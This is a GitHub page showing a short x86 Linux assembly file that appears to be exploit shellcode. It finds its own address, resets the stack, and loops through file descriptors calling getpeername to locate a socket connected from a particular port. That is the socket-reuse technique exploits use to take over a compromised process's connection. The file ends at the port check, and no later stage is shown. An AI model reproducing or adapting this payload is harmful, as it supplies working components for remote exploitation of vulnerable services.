-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexample.s
More file actions
executable file
·42 lines (41 loc) · 771 Bytes
/
example.s
File metadata and controls
executable file
·42 lines (41 loc) · 771 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
normalizeespandebp:
sub $0x50 , %esp
call geteip
geteip:
pop %ebx
//ebx now has our base!
movl %ebx,%esp
subl $0x1000,%esp
//esp is now a nice value
mov %esp,%ebp
//ebp is now a nice value too! :>
donenormalize:
mainentrypoint:
//address of j into edi
lea 0xffffffd4(%ebp),%edi
sub $0x2c,%esp
//i=256*3
mov $0x300,%ebx
//j=0x10
movl $0x10,0xffffffd4(%ebp)
lea 0xffffffd8(%ebp),%esi
lea 0x0(%esi),%esi
findsockloop:
//&j
push %edi
//&addr
push %esi
//i
push %ebx
//call get peername
xchg %ebx,%edx
mov $0x66,%eax
mov $0x7,%ebx
lea 0x0(%esp,1),%ecx
int $0x80
xchg %ebx,%edx
add $0x10,%esp
cmp $0,%eax
jne continueloop
//if we got here, we did got 0 (success) as the result of getpeername()
cmpw $0x5321,0xffffffda(%ebp)